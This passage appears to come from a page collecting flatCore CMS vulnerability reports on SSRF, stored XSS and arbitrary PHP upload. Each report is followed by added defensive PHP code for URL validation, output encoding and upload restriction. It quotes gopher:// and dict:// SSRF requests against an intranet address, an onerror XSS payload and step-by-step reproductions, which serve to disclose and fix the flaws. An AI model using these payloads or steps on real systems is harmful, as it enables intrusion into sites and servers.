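    } else {
        // SVG, PDF, HTML and everything else: forced download under a generic
        // type, so an embedded <script> or PDF JavaScript never runs on our origin.
        $name = preg_replace('/[^A-Za-z0-9._-]/', '_', basename($path));
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="' . $name . '"');
    }
    header('Content-Length: ' . filesize($path));
    readfile($path);
    return 200;
}

// Usage (route requests for /content/* to this script, e.g. with mod_rewrite):
//   files.php?f=images/xss.svg   -> offered as a download, not rendered
//   files.php?f=images/logo.png  -> displayed inline
if (PHP_SAPI !== 'cli') {
    serve_upload(__DIR__ . '/content', (string) ($_GET['f'] ?? ''));
}
```

If routing uploads through PHP is not wanted, the same three headers (nosniff, a sandbox CSP, and Content-Disposition: attachment for non-raster types) can be set by the web server for the content/ directory; the point is that the decision to render is made by the server, not by the uploaded file.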

Server-side request forgery vulnerability (SSRF)

Describe the bug
Server-side request forgery vulnerability (SSRF)

To Reproduce
Steps to reproduce the behavior:
  1. Go to 'acp/acp.php?tn=pages&sub=index'
  2. Enter the intranet address in the box to request
  3. A request can be made to the intranet

Screenshots: request packet

Locate the vulnerable code in /acp/core/pages.index.php: the start_index parameter calls the function fc_crawler.

Tracing the fc_crawler function, locate the vulnerable code in /acp/core/functions_index.php, and continue to track the fc_loadSourceCode function.

dict protocol for the request:
dict://ip:port

Use the gopher protocol for the request:
gopher://192.168.172.114:9333/aaaaa

This led to the SSRF vulnerability.

Desktop (please complete the following information):

  • OS: MacOS
  • Browser all
  • Version last version
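A crawler that fetches whatever URL the form contains will reach loopback, intranet hosts and non-HTTP schemes, which is what this report shows for dict:// and gopher://. Below is an added example written for this page (not flatCore's fc_loadSourceCode and not the reporter's code) of a fetch helper that validates the target before connecting and pins the connection to the address that passed validation. Function names and the sample addresses are my assumptions.

```php
<?php
// Added example, not flatCore's own code: a fetch helper for a crawler such
// as the start_index feature, restricted to public http(s) targets so the
// dict://, gopher:// and intranet requests from this report are refused
// before any connection is made. Function names are assumptions.
declare(strict_types=1);

/** True only for globally routable addresses: rejects 127/8, 10/8, 172.16/12,
 *  192.168/16, 169.254/16, 0/8, ::1, fc00::/7 and the other reserved blocks. */
function is_public_ip(string $ip): bool
{
    return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false;
}

/** Validate a user-supplied URL; return host, resolved IP and port, or null. */
function resolve_public_target(string $url): ?array
{
    $p = parse_url($url);
    if ($p === false || !isset($p['scheme'], $p['host'])) {
        return null;
    }
    $scheme = strtolower($p['scheme']);
    if (!in_array($scheme, ['http', 'https'], true)) {
        return null;                                  // no dict://, gopher://, file://, ...
    }
    if (isset($p['user']) || isset($p['pass'])) {
        return null;                                  // no credentials smuggled in the URL
    }
    $port = $p['port'] ?? ($scheme === 'https' ? 443 : 80);
    if (!in_array($port, [80, 443], true)) {
        return null;                                  // no probing of arbitrary ports
    }
    $host = $p['host'];
    $ip   = filter_var($host, FILTER_VALIDATE_IP) ? $host : gethostbyname($host);
    if (!is_public_ip($ip)) {
        return null;                                  // intranet or loopback, or DNS failed
    }
    return ['host' => $host, 'ip' => $ip, 'port' => $port];
}

/** Fetch page source with the connection pinned to the address that passed validation. */
function fetch_source_code(string $url): ?string
{
    $t = resolve_public_target($url);
    if ($t === null) {
        return null;
    }
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER  => true,
        CURLOPT_PROTOCOLS       => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_REDIR_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_FOLLOWLOCATION  => false,  // a redirect to 127.0.0.1 would bypass the checks above
        CURLOPT_RESOLVE         => ["{$t['host']}:{$t['port']}:{$t['ip']}"], // no DNS rebinding between check and use
        CURLOPT_CONNECTTIMEOUT  => 5,
        CURLOPT_TIMEOUT         => 10,
        CURLOPT_MAXFILESIZE     => 2000000,
    ]);
    $body = curl_exec($ch);
    curl_close($ch);
    return is_string($body) ? $body : null;
}

// Checks on constructed inputs (the rejections need no network access):
var_dump(resolve_public_target('dict://127.0.0.1:2628'));               // NULL (scheme)
var_dump(resolve_public_target('gopher://192.168.172.114:9333/aaaaa')); // NULL (scheme)
var_dump(resolve_public_target('http://10.0.0.5/'));                     // NULL (private range)
var_dump(resolve_public_target('http://127.0.0.1:8080/'));               // NULL (port, and loopback)
var_dump(resolve_public_target('http://93.184.216.34/') !== null);       // bool(true): public address
```

Two details matter beyond the scheme check: redirects are not followed, because a public host can redirect to 127.0.0.1 after validation, and CURLOPT_RESOLVE makes curl connect to the IP that was checked rather than resolving the name a second time. If the crawler is only ever meant to index the site itself, the stricter option is to accept paths only and prepend the site's own base URL.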

Store XSS in Edit picture/file function

Describe the bug
Store XSS in Edit picture/file function

To Reproduce
Steps to reproduce the behavior:

  1. Use the account to login to the admin interface
  2. Upload files or photos via the upload function
  3. In the file management interface, use the image or file information editing function
  4. Insert xss payload in "Alt" field then save
  5. Payload is executed
     XSS Payload:
     "><img src=a onerror=alert(document.domain)>
  6. Then every time the image/file info editing function is used, the payload executes

Desktop (please complete the following information):

  • OS: All
  • Browser: All
  • Version: Last version
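The stored and reflected XSS reports on this page (page description, snippet title/keyword/URL, install-page username, Exclude URLs, post title, group_name, the image "Alt" field above, the log view showing a User-Agent, and the links built from $_SERVER['PHP_SELF']) all come down to untrusted strings being written into HTML unencoded. The block below is an added example written for this page (not flatCore's code and not the reporters' code) of contextual output encoding and of building ACP links from a known script name instead of PHP_SELF. The helper names, the allow-list of entry points and the sample row are my assumptions.

```php
<?php
// Added example, not flatCore's own code: contextual output encoding for the
// kinds of values the XSS reports show being echoed raw (page description,
// snippet title, image "Alt" text, group_name, log entries such as the
// User-Agent) and a safe replacement for $_SERVER['PHP_SELF'] in links.
// Helper names and the entry-point allow-list are assumptions.
declare(strict_types=1);

/** HTML body and attribute context. ENT_QUOTES also escapes ' so single-quoted
 *  attributes are safe; ENT_SUBSTITUTE avoids returning '' on invalid UTF-8. */
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

/** Value placed inside an inline <script> as a JS string literal. */
function e_js(string $value): string
{
    return json_encode($value, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR);
}

/** Form action / link target: use the script name the application knows,
 *  never PHP_SELF, which reflects attacker-controlled PATH_INFO. */
function acp_url(string $script, array $query): string
{
    $allowed = ['acp.php', 'index.php'];          // assumption: the ACP's entry points
    if (!in_array($script, $allowed, true)) {
        throw new InvalidArgumentException('unknown script');
    }
    return e($script . '?' . http_build_query($query));
}

/** Render one row of the "see all pages" table. Every value passes through e(). */
function render_page_row(array $page): string
{
    return '<tr><td>' . e($page['title']) . '</td>'
         . '<td><img src="' . e($page['image']) . '" alt="' . e($page['alt']) . '"></td>'
         . '<td>' . e($page['description']) . '</td>'
         . '<td><a href="' . acp_url('acp.php', ['tn' => 'pages', 'sub' => 'edit', 'editpage' => $page['id']]) . '">edit</a></td></tr>';
}

// Constructed sample row carrying the payloads quoted in the reports.
$page = [
    'id'          => 2,
    'title'       => 'Home',
    'image'       => 'content/images/logo.png',
    'alt'         => '"><img src=a onerror=alert(document.domain)>',
    'description' => '<script>alert(1)</script>',
];
$html = render_page_row($page);
var_dump(strpos($html, '<script>') === false);          // bool(true): no tag reaches the browser
var_dump(strpos($html, 'onerror=') !== false);           // bool(true): the text survives, but as inert text
var_dump(strpos($html, '&quot;&gt;&lt;img') !== false);  // bool(true): the attribute cannot be closed early
echo '<script>var title = ' . e_js($page['description']) . ";</script>\n";
// prints <script>var title = "\u003Cscript\u003Ealert(1)\u003C\/script\u003E";</script>
```

The same e() call belongs in the log view: the User-Agent header in the "Multiple XSS" report is just another untrusted string, stored and later rendered. Encoding on output (rather than filtering on input, as the group-creation report suggests) is what keeps every stored field safe regardless of which form wrote it, and a Content-Security-Policy without 'unsafe-inline' limits the damage when one spot is missed.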

There is an arbitrary file upload vulnerability

Arbitrary files can be uploaded in the backend of your website; you can upload PHP files, so if the administrator password is leaked, a file uploaded here can be used directly to get a shell and take over the web server.
Example:

I think you should limit the type of file that can be uploaded.
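This report, the two plugin-upload reports, the Module Addons report and the CSRF upload report above all describe the same missing controls: no check of the file type, the client's file name kept, and PHP files landing in a directory the web server executes. The following is an added example written for this page (not flatCore's code and not the reporters' code) of an upload policy that fixes all three, plus a no-execute .htaccess for the upload tree, since Apache is the documented web server. Directory names, the form field name and the class and function names are my assumptions.

```php
<?php
// Added example, not flatCore's own code: validating an uploaded file before
// it is stored under content/ and preparing the upload directory so that
// nothing in it can execute. It addresses the points the upload reports make:
// no type check, original file name kept, PHP reachable under the web root.
// Directory names and the form field name are assumptions.
declare(strict_types=1);

final class UploadPolicy
{
    /** extension => MIME type the file content must actually have */
    private const ALLOWED = [
        'png'  => 'image/png',
        'jpg'  => 'image/jpeg',
        'jpeg' => 'image/jpeg',
        'gif'  => 'image/gif',
        'pdf'  => 'application/pdf',
        'zip'  => 'application/zip',
    ];
    private const MAX_BYTES = 10 * 1024 * 1024;

    /** Store one entry of $_FILES; return the path written, or throw. */
    public static function store(array $file, string $targetDir): string
    {
        if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
            throw new RuntimeException('upload failed');
        }
        if (($file['size'] ?? 0) > self::MAX_BYTES) {
            throw new RuntimeException('file too large');
        }
        // Only the last extension counts, lower-cased, and only if allow-listed:
        // shell.php, .phtml and .htaccess are refused here; shell.php.png gets
        // through as "png" only to fail the content check below.
        $ext = strtolower(pathinfo((string) $file['name'], PATHINFO_EXTENSION));
        if (!isset(self::ALLOWED[$ext])) {
            throw new RuntimeException('file type not allowed');
        }
        // The bytes must agree with the extension: a PHP script renamed to .png
        // is detected as text/x-php and rejected.
        $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
        if ($mime !== self::ALLOWED[$ext]) {
            throw new RuntimeException("content type $mime does not match .$ext");
        }
        // Never keep the client's name: the stored name is random, so the
        // uploader cannot choose a path such as webshell.php.
        $dest = rtrim($targetDir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
        if (!is_uploaded_file($file['tmp_name']) || !move_uploaded_file($file['tmp_name'], $dest)) {
            throw new RuntimeException('could not store file');
        }
        chmod($dest, 0644);   // data, not executable
        return $dest;
    }
}

/** Apache: refuse to serve or run scripts from the upload tree (defence in depth). */
function write_noexec_htaccess(string $dir): void
{
    $rules = <<<'HTACCESS'
<FilesMatch "\.(php|php[0-9]|phtml|phar)$">
    Require all denied
</FilesMatch>
RemoveHandler .php .phtml .phar
HTACCESS;
    file_put_contents(rtrim($dir, '/') . '/.htaccess', $rules . "\n", LOCK_EX);
}

/** Plugin archives are code by nature, so at least refuse entries that would
 *  escape the plugin directory (zip-slip) before extracting anything. */
function zip_entries_are_contained(string $zipPath): bool
{
    $zip = new ZipArchive();
    if ($zip->open($zipPath) !== true) {
        return false;
    }
    $ok = true;
    for ($i = 0; $i < $zip->numFiles; $i++) {
        $entry = (string) $zip->getNameIndex($i);
        if ($entry === '' || $entry[0] === '/' || strpos($entry, '..') !== false || strpos($entry, '\\') !== false) {
            $ok = false;
            break;
        }
    }
    $zip->close();
    return $ok;
}

// Usage in the upload handler (assumes the form field is named "file"):
if (PHP_SAPI !== 'cli' && isset($_FILES['file'])) {
    try {
        $stored = UploadPolicy::store($_FILES['file'], __DIR__ . '/content/files');
    } catch (RuntimeException $e) {
        http_response_code(400);
        exit('Upload rejected: ' . htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8'));
    }
}
```

The plugin installer is a different case: installing a plugin is code execution by design, so no file filter makes it safe. What the reports argue for there is keeping that path behind the administrator role and a CSRF token, and keeping the ordinary content/ upload tree free of anything executable, so that a leaked admin password, the scenario in this last report, does not turn into a shell on the server.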
